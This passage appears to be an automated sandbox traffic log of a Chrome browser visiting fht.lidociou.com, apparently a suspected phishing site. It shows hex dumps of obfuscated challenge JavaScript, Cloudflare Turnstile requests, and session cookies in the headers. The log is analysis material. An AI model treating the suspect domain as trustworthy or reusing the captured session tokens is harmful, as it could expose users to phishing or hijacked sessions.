                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 5b 67 4d 28 37 34 33 29 5d 28 67 5b 67 4d 28 31 36 31 32 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 31 35 37 35 29 5d 28 67 5b 67 4d 28 31 36 31 32 29 5d 29 29 3a 67 5b 67 4d 28 31 36 31 32 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 37 34 33 29 5d 28 67 5b 67 4d 28 31 36 31 32 29 5d 29 2c 6d 3d 69 7c 7c 6b 5b 67 4d 28 35 33 35 29 5d 2c 6e 3d 65 4d 5b 67 4d 28 31 35 32 34 29 5d 5b 67 4d 28 33 34 30 29 5d 3f 6b 5b 67 4d 28 36 35 36 29 5d 28 6b 5b 67 4d 28 36 35 36 29 5d 28 27 68 2f 27 2c 65 4d 5b 67 4d 28 31 35 32 34 29 5d 5b 67 4d 28 33 34 30 29 5d 29 2c 27 2f 27 29 3a 27 27 2c 6f 3d 6b 5b 67 4d 28 36 35 36 29 5d 28 6b 5b 67 4d 28 31 32 37 39 29 5d 28 6b 5b 67 4d 28 36 30 34 29 5d 28 6b 5b 67 4d 28 36 30 34 29 5d 28 6b 5b 67 4d 28 31 36 34 30 29 5d 28 6b 5b 67 4d 28 34
                                                                              Data Ascii: [gM(743)](g[gM(1612)],Object[gM(1575)](g[gM(1612)])):g[gM(1612)]=JSON[gM(743)](g[gM(1612)]),m=i||k[gM(535)],n=eM[gM(1524)][gM(340)]?k[gM(656)](k[gM(656)]('h/',eM[gM(1524)][gM(340)]),'/'):'',o=k[gM(656)](k[gM(1279)](k[gM(604)](k[gM(604)](k[gM(1640)](k[gM(4
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 4a 28 33 39 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 2c 67 2c 68 2c 67 50 2c 69 2c 6a 2c 6b 2c 6c 29 7b 28 67 50 3d 67 4a 2c 69 3d 64 5b 67 50 28 31 31 36 31 29 5d 28 29 2c 6a 3d 67 50 28 35 36 36 29 2c 69 5b 67 50 28 33 39 32 29 5d 28 6a 29 3e 2d 31 29 3f 65 4d 5b 67 50 28 31 31 35 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 51 29 7b 67 51 3d 67 50 2c 65 4d 5b 67 51 28 31 35 34 38 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6b 3d 7b 7d 2c 6b 5b 67 50 28 31 36 32 38 29 5d 3d 64 2c 6b 5b 67 50 28 39 36 38 29 5d 3d 65 2c 6b 5b 67 50 28 31 35 36 37 29 5d 3d 66 2c 6b 5b 67 50 28 31 32 34 38 29 5d 3d 67 2c 6b 5b 67 50 28 31 36 31 32 29 5d 3d 68 2c 6c 3d 6b 2c 65 4d 5b 67 50 28 31 31 35 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 52 29 7b 67 52 3d 67 50 2c 65
                                                                              Data Ascii: J(396)]=function(d,e,f,g,h,gP,i,j,k,l){(gP=gJ,i=d[gP(1161)](),j=gP(566),i[gP(392)](j)>-1)?eM[gP(1153)](function(gQ){gQ=gP,eM[gQ(1548)]()},1e3):(k={},k[gP(1628)]=d,k[gP(968)]=e,k[gP(1567)]=f,k[gP(1248)]=g,k[gP(1612)]=h,l=k,eM[gP(1153)](function(gR){gR=gP,e
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 5b 67 4a 28 38 37 31 29 5d 3d 65 5a 2c 66 53 5b 67 4a 28 38 31 33 29 5d 3d 66 30 2c 66 53 5b 67 4a 28 38 30 36 29 5d 3d 66 6d 2c 66 53 5b 67 4a 28 31 34 37 36 29 5d 3d 66 6f 2c 66 53 5b 67 4a 28 35 37 36 29 5d 3d 66 6e 2c 66 53 5b 67 4a 28 31 33 30 39 29 5d 3d 66 79 2c 66 53 5b 67 4a 28 37 33 32 29 5d 3d 66 78 2c 66 53 5b 67 4a 28 34 37 31 29 5d 3d 66 77 2c 66 53 5b 67 4a 28 31 34 31 35 29 5d 3d 66 76 2c 66 53 5b 67 4a 28 31 33 34 34 29 5d 3d 66 67 2c 66 53 5b 67 4a 28 31 30 31 31 29 5d 3d 66 52 2c 66 53 5b 67 4a 28 39 34 32 29 5d 3d 66 6b 2c 66 53 5b 67 4a 28 31 30 32 34 29 5d 3d 66 68 2c 66 53 5b 67 4a 28 31 34 37 39 29 5d 3d 66 64 2c 66 53 5b 67 4a 28 31 33 34 31 29 5d 3d 66 63 2c 65 4d 5b 67 4a 28 36 37 36 29 5d 3d 66 53 2c 66 54 3d 5b 5d 2c 66 55 3d
                                                                              Data Ascii: [gJ(871)]=eZ,fS[gJ(813)]=f0,fS[gJ(806)]=fm,fS[gJ(1476)]=fo,fS[gJ(576)]=fn,fS[gJ(1309)]=fy,fS[gJ(732)]=fx,fS[gJ(471)]=fw,fS[gJ(1415)]=fv,fS[gJ(1344)]=fg,fS[gJ(1011)]=fR,fS[gJ(942)]=fk,fS[gJ(1024)]=fh,fS[gJ(1479)]=fd,fS[gJ(1341)]=fc,eM[gJ(676)]=fS,fT=[],fU=
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 3d 68 7d 2c 27 6c 48 54 62 71 27 3a 69 55 28 33 37 31 29 2c 27 4a 64 6a 65 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 70 64 54 61 50 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 50 75 71 66 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 62 45 5a 48 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 66 5a 75 6a 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 77 42 4b 72 46 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 46 73 48 6b
                                                                              Data Ascii: function(h,i){return i!==h},'lHTbq':iU(371),'Jdjen':function(h,i){return h>i},'pdTaP':function(h,i){return h<i},'PuqfS':function(h,i){return h(i)},'bEZHy':function(h,i){return h|i},'fZuji':function(h,i){return h==i},'wBKrF':function(h,i){return h-i},'FsHk
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 50 29 7b 69 66 28 69 58 3d 69 55 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 69 58 28 31 36 33 32 29 5d 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 69 58 28 34 38 39 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 69 58 28 35 35 39 29 5d 5b 69 58 28 37 35 31 29 5d 5b 69 58 28 31 34 37 37 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 69 58 28 35 35 39 29 5d 5b 69 58 28 37 35 31 29 5d 5b 69 58 28 31 34 37 37 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 20 69 66 28 64 5b 69 58 28 34 39 31 29 5d 28 69 58 28 37 30 33 29 2c 69 58 28
                                                                              Data Ascii: P){if(iX=iU,i==null)return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[iX(1632)];J+=1)if(K=i[iX(489)](J),Object[iX(559)][iX(751)][iX(1477)](x,K)||(x[K]=E++,B[K]=!0),L=C+K,Object[iX(559)][iX(751)][iX(1477)](x,L))C=L;else if(d[iX(491)](iX(703),iX(
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 69 58 28 33 32 30 29 5d 28 64 5b 69 58 28 31 35 34 36 29 5d 28 74 68 69 73 2e 68 5b 32 32 38 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 69 58 28 31 35 33 32 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 32 32 38 5d 5b 30 5d 2b 2b 29 2d 31 30 33 2c 32 35 36 29 2c 32 35 35 29 29 29 2c 50 5b 33 5d 3d 74 68 69 73 2e 68 5b 64 5b 69 58 28 31 33 34 38 29 5d 28 32 32 38 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 31 35 33 2b 74 68 69 73 2e 68 5b 32 32 38 5e 74 68 69 73 2e 67 5d 5b 31 5d 5b 69 58 28 31 35 33 32 29 5d 28 74 68 69 73 2e 68 5b 64 5b 69 58 28 31 35 37 30 29 5d 28 32 32 38 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 26 32 35 35 5e 31 34 35 2c 74 68 69 73 2e 68 5b 4f 5e 74 68 69 73 2e 67 5d 3d 4d 5b 69 58 28 31 34 36 30 29 5d 28 74 68 69 73 2c 50 29 7d 65 6c
                                                                              Data Ascii: iX(320)](d[iX(1546)](this.h[228^this.g][1][iX(1532)](this.h[this.g^228][0]++)-103,256),255))),P[3]=this.h[d[iX(1348)](228,this.g)][3]^153+this.h[228^this.g][1][iX(1532)](this.h[d[iX(1570)](228,this.g)][0]++)&255^145,this.h[O^this.g]=M[iX(1460)](this,P)}el
                                                                              2024-12-11 14:19:48 UTC1369INData Raw: 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 29 7b 47 5b 69 58 28 34 32 31 29 5d 28 64 5b 69 58 28 31 36 30 30 29 5d 28 6f 2c 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20 47 5b 69 58 28 31 32 31 37 29 5d 28 27 27 29 7d 2c 27 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 59 29 7b 72 65 74 75 72 6e 20 69 59 3d 69 55 2c 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 64 5b 69 59 28 34 36 37 29 5d 28 27 27 2c 68 29 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 69 59 28 31 36 33 32 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 5a 29 7b 72 65 74 75 72 6e 20 69 5a 3d 69 59 2c 68 5b 69 5a 28 31 35 33 32 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a
                                                                              Data Ascii: >>=1,s++);for(;;)if(H<<=1,j-1==I){G[iX(421)](d[iX(1600)](o,H));break}else I++;return G[iX(1217)]('')},'j':function(h,iY){return iY=iU,h==null?'':d[iY(467)]('',h)?null:f.i(h[iY(1632)],32768,function(i,iZ){return iZ=iY,h[iZ(1532)](i)})},'i':function(i,j,o,j


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              16192.168.2.1649728104.21.86.904436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:49 UTC1317OUTGET /favicon.ico HTTP/1.1
                                                                              Host: fht.lidociou.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://fht.lidociou.com/lrjqM/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IkE4VDhjdXFoejc5SUkvWHRYUEIyNmc9PSIsInZhbHVlIjoic0tXZjAvSGg1THFpdktBOXJadCtVUnJiR2MzYVJ1UjdvYUVmMXpEalpYSTJrYzh0czlKczhpaGpUU3o1RzArajRpclBpWi90SUsrL1RobmkvR2tlaXJZRkpLRUdYSG11ZDdic2JyNlNiVkIzMHU4Z0dCUDJqM0JDY3Awa0Q2Tk4iLCJtYWMiOiIwZTlkZGY2YTIxZDQ4ZDM1MmRjZjA2ZTA1NjYxNzRiMzI3OTA5YjA2ZjAxOWQyYjNiNDIyOTgwMDRmM2I1MGNjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InVyRmtMWHN1MXdJR2NTV001SDdYZGc9PSIsInZhbHVlIjoiMDRiZXU4M28ycFFJOG9zVzVPaDZHaUFyZUdVNHVZM3RNdm1BL3RBaDhuNnhWKzRMVFVYcWdBbFkyUVIrMGthUU1PZ0xVMEV5SklHbUNxeDNaY1h4RmJOZHdLSW5FTWZtQ1ZvZXp0eFkyZlAzU0xkK2lDbzRleVZsSFRzclcxTTQiLCJtYWMiOiJkZDg1NGNhNWRjNzBkYjY0ODM5ZTk5MDExYjA1MzQwNDAzNzg2MzRiNDcwNzAwOWYyMmU3YThhODI3MTI2ODhhIiwidGFnIjoiIn0%3D
                                                                              2024-12-11 14:19:49 UTC1066INHTTP/1.1 404 Not Found
                                                                              Date: Wed, 11 Dec 2024 14:19:49 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: max-age=14400
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YlRGWgh5SJgyPrXvPyL5W5WFYijsbRb75o23PDkVIOGv4OecdJjYCSMjIG218qWuZoCWxkpFlQKHGB13%2BHcDfdQyxNmWnqb%2B3p2R7q5354dGIJLmDyOX0HSDn5Hfow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Vary: Accept-Encoding
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6381&min_rtt=6371&rtt_var=2409&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2111&delivery_rate=448853&cwnd=241&unsent_bytes=0&cid=f6a420f6a8a87d41&ts=132&x=0"
                                                                              CF-Cache-Status: HIT
                                                                              Age: 12398
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061ca13cef4350-EWR
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1746&rtt_var=800&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1895&delivery_rate=1253218&cwnd=201&unsent_bytes=0&cid=b2f286ac047b3a16&ts=484&x=0"
                                                                              2024-12-11 14:19:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              17192.168.2.1649729104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:50 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:50 UTC379INHTTP/1.1 404 Not Found
                                                                              Date: Wed, 11 Dec 2024 14:19:50 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: t66Dr/jcIfZKwZc90O1nYnfuxz6gSu+2a5o=$C+SIMaNBvnxg524/
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061ca9ebabf799-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:50 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.1649730104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:50 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8f061c7f6a0e43aa/1733926788305/RiSF0WxLge_mIxD HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:51 UTC200INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:50 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061cab695143d6-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:51 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 62 00 00 00 5d 08 02 00 00 00 d1 eb 24 21 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRb]$!IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.164973135.190.80.14436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:50 UTC533OUTOPTIONS /report/v4?s=YlRGWgh5SJgyPrXvPyL5W5WFYijsbRb75o23PDkVIOGv4OecdJjYCSMjIG218qWuZoCWxkpFlQKHGB13%2BHcDfdQyxNmWnqb%2B3p2R7q5354dGIJLmDyOX0HSDn5Hfow%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Origin: https://fht.lidociou.com
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:51 UTC336INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              access-control-max-age: 86400
                                                                              access-control-allow-methods: POST, OPTIONS
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-headers: content-type, content-length
                                                                              date: Wed, 11 Dec 2024 14:19:51 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.1649732104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:52 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8f061c7f6a0e43aa/1733926788305/RiSF0WxLge_mIxD HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:52 UTC200INHTTP/1.1 200 OK
                                                                              Date: Wed, 11 Dec 2024 14:19:52 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f061cb6589b42a6-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-12-11 14:19:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 62 00 00 00 5d 08 02 00 00 00 d1 eb 24 21 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRb]$!IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.1649733104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:52 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8f061c7f6a0e43aa/1733926788306/994b8034e574a2411887595169e207500de62f8c2bd74fbc747241d30a2e7af9/V_4VoVIq-fp0XsL HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/gotfg/0x4AAAAAAAbRCGJdTPdP8Ybc/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:52 UTC143INHTTP/1.1 401 Unauthorized
                                                                              Date: Wed, 11 Dec 2024 14:19:52 GMT
                                                                              Content-Type: text/plain; charset=utf-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              2024-12-11 14:19:52 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 6d 55 75 41 4e 4f 56 30 6f 6b 45 59 68 31 6c 52 61 65 49 48 55 41 33 6d 4c 34 77 72 31 30 2d 38 64 48 4a 42 30 77 6f 75 65 76 6b 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gmUuANOV0okEYh1lRaeIHUA3mL4wr10-8dHJB0wouevkAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                              2024-12-11 14:19:52 UTC1INData Raw: 4a
                                                                              Data Ascii: J


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              22192.168.2.164973435.190.80.14436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:52 UTC474OUTPOST /report/v4?s=YlRGWgh5SJgyPrXvPyL5W5WFYijsbRb75o23PDkVIOGv4OecdJjYCSMjIG218qWuZoCWxkpFlQKHGB13%2BHcDfdQyxNmWnqb%2B3p2R7q5354dGIJLmDyOX0HSDn5Hfow%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 428
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-12-11 14:19:52 UTC428OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 31 33 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 66 68 74 2e 6c 69 64 6f 63 69 6f 75 2e 63 6f 6d 2f 6c 72 6a 71 4d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 36 2e 39 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":3138,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://fht.lidociou.com/lrjqM/","sampling_fraction":1.0,"server_ip":"104.21.86.90","status_code":404,"type":"http.error"},"type":"network-error",
                                                                              2024-12-11 14:19:53 UTC168INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              date: Wed, 11 Dec 2024 14:19:52 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              23192.168.2.1649735104.18.95.414436636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-11 14:19:55 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/253155817:1733923695:mM-KLczH2CXphey7QIg7rQsY9Vh66LXeu-8hr5wSDxE/8f061c7f6a0e43aa/I4QnKzgsFcrsblePKpbDs_Q77AQFAQc48Yo9MGAmJgE-1733926783-1.1.1.1-QqogzN8CSnrMTMPigFQs0HNyIjjrp0QbL8ZSV6_WdiYEcGZzVpgZAsh7XUOdf5aA HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 31462
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
